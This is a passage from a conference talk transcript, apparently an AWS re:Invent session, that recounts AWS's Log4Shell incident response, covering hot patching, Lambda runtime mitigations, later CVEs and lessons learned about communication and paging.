Our hot patch rollout does cause a brief issue, though. In some cases, the rollout caused some small transient spikes in latency. And it's worth noticing at this point that we didn't ask teams to deploy the hot patch on their own; we did it for them. This is really unusual for us. Generally, teams at AWS are responsible for doing all of this work.

They have to get the patches and deployments out to their services, and in this case, teams are still responsible for that main patch. But for defense in depth, we deployed the hot patch in parallel on their behalf. At the same time, from the 11th to the 14th, patching work continues: we track down stray tasks, we track down stray functions, we fix developer desktops. And then it's time to start looking at our fourth step: I've patched, and now what do I do? At around 7 p.m., we start kicking off what follow-up investigations look like for service teams. We split off another separate thread from the main group to start helping service teams with investigations. That's guidance for how teams know when they're done, that's helping them pull their service and application logs, and that's helping them sort through any of that data to see if there's new information we can use to drive more mitigations or detections.

Lambda. How many folks use Lambda? Lambda was an interesting one. Lambda doesn't include Log4j in any of its managed runtimes or any of the base container images, but Lambda customers do. So on December 12th, we make a change to the Lambda managed runtimes that basically pulls the hot patch in to mitigate the issue for customers. This means that if you're vulnerable as a customer and you're running an affected version of Log4j, this change patches it for you automatically. This, for what it's worth, is also unusual, and it's part of how compute shifts: how folks run EC2 instances is not quite how things work for someone running Lambda or containers. And I think it ended up being really important to customers. Even though the base configuration I got from you folks doesn't have Log4j, I'm still impacted, and we can't just leave customers there because it didn't come from us.

On December 14th, another Log4j CVE. Actually, two. The first one is basically that the original patch, spoiler alert, was not complete, still, in some non-standard configurations. Security people love saying "non-standard configurations," by the way. It basically means: out of the box, don't worry about it, but if you did this other thing, maybe. Basically, RCE was still possible in some non-standard configurations. And then again, in some non-default configurations, if you were using the JMSAppender and someone had write access, RCE was still possible. AWS is not impacted by either of these, because we blew away our friend the JndiLookup class on day one, and because we included Log4j v1 from the beginning. This is good foreshadowing again, because by December 14th, the internet has verified for us that Log4j v1 was actually affected.

Later on the 14th, we end up publishing that hot patch RPM. We've produced basically a package of the internal hot patch that other folks can use. Amazon Linux 1 and Amazon Linux 2 are not impacted by Log4Shell out of the box (we didn't ship those versions of Log4j), but some customers do run them. So on the 14th, we published that RPM so Amazon Linux customers can use it as well.

On the 17th, it's our last and final (for this exercise) Log4Shell CVE. This is the last one, and it basically says that under some conditions a denial of service, so a DoS, is possible through our friend from Computer Science 101: recursion. AWS is not impacted. So on the 17th, Amazon Linux 1 and 2 start applying the hot patch by default to installed JDKs, and then we publish an APT repo so that folks using Debian or Ubuntu, who aren't on Amazon Linux, can use it as well. And that, I think, is the end of our initial response.

So we've had five CVEs. We've started basically uncountable numbers of parallel threads for our deployments, hot patching and regular patching, leadership updates, and customer messaging.

So, what went well and what didn't go well? Starting with the bad, there were some less successful elements here. The first one: as we were figuring out how to get these changes rolled out for teams, there were some rocky bits, especially in terms of communication. Namely, if you were just a team receiving a ticket and you were seeing the public information around additional CVEs, we didn't do an amazing job internally publishing "we're not impacted, we're not impacted, we're not impacted." That made the response a little tricky for service teams as they were trying to parse the information that came through on the external side.

We were inconsistent with providing our customer messaging. We got a little distracted by the internal work, and I think we were a little slow (some of you might have noticed) getting some customer bulletins out around which services were impacted or not, or what action you had to take as a customer.

We had some rollout snags with the hot patch, so those latency blips for Lambda. And we briefly covered this already, but deploying things on behalf of teams is really unusual for us, and that definitely caused some confusion for teams as they were trying to figure out: well, if you're rolling out the hot patch, do I still have to do things? Do I still have to patch? Do I still have to deploy? How do those things work together?

And lastly, our tickets often went right to service on-calls, and those folks weren't necessarily familiar with Log4Shell. They weren't necessarily folks who usually responded to security issues; a lot of them generally get paged for things like operational issues, your service returning some weird errors. In a lot of cases, we know now that we should have gone directly to people like principal engineers or managers, the folks those on-calls ended up having to escalate to. We could have gone straight to them. But there were some really, really cool wins here on top of that.

So the first one: Ryan removing the entire JndiLookup class and assuming that Log4j v1 was affected from the beginning. Huge, huge win by Ryan. That was incredibly smart, and also paranoid and delightful. So a big thanks to Ryan on that one.

This is my not-to-scale illustration of what defense in depth looked like, but I was really proud of how defense in depth ended up working for Log4Shell here. We had the hot patch, the regular patch, things like those WAF traffic filtering rules, and then the proactive blocking of potential exploit attempts.

The hot patch from Volker: incredibly cool, I think not just for us but for a lot of folks external to AWS that also ended up using it. Really cool and a big game changer. If patching is hard, which it is in a lot of places, being able to patch the running JVM was a big win.

Four: Builder Tools held up pretty well. This is an unbelievably massive amount of deployments, which means an unbelievably massive amount of load on the build systems, and some proactive thinking from the Builder Tools teams around things like scaling up in waves really made some of this possible.

Finally, this required hard work from thousands of teams during a really particularly tough time of year. Folks want to go on holidays, their kids have holiday concerts, they have vacations planned. Log4Shell is not necessarily compatible with vacation plans. But nothing gets you in the holiday spirit like a zero-day.

More generally, what did we learn about what works and what doesn't? The first: engage our leaders early. We know that Ghostbusters is a senior engineering group and we're leading with that from the security side, but on the service team side, the folks who own pieces like EC2, engaging them early was the right call. Two: we know that we have to over-communicate, and we have to communicate much more and much more often.

Three: we have to work backwards from what we can do for teams, so what work we can do centrally so that teams don't have to do anything. If we had asked teams to do every single piece of work here on their own, it would have been an incredibly large spend of resources for something that was already very expensive. So the more we can do for them to make it easier, the better things end up going. Four: you have to have a plan for the whole long haul.

In this case, that means things like: when do people sleep? When do people eat? When do people get a chance to sign off, go offline, and bake cookies or go to the gym? I don't know. But you have to have a plan for how to not burn people out in the first couple of minutes of the first day. And then five: you page who you need. It's OK, in a case like this, to go straight to senior people: to page a team's principal engineers (that's what they're for), or to page senior leadership, like the general manager of a service. When things are really important, you just go straight to who you need. We're all here to be paged; we're all paid to work on these services.

And six: you have to be flexible, you have to iterate quickly, and you have to be ready to move on the fly and do things like start rolling out a hot patch.

By the end of this exercise, we wrote around six separate retrospectives for how Log4Shell went: everything from the initial incident response, to how well the build tooling performed, to what we could have improved in our analysis.

And finally, before I let you folks go, this would not be a Log4Shell talk without acknowledging the incredible dedication and hard work from thousands and thousands and thousands of AWS teams. This was a tough one. I know that it was a tough one for customers too, and none of this would have been possible without the hard work from a lot of folks. That is all.

Thank you for joining me on this last day of re:Invent. We won't do questions on the recording, but I'll hang out for a few minutes at the back of the room if you want to ask any questions. And I am contractually obligated to tell you to please do the session survey on how much you love a Friday 10 a.m. session. That is all. Thank you very much.
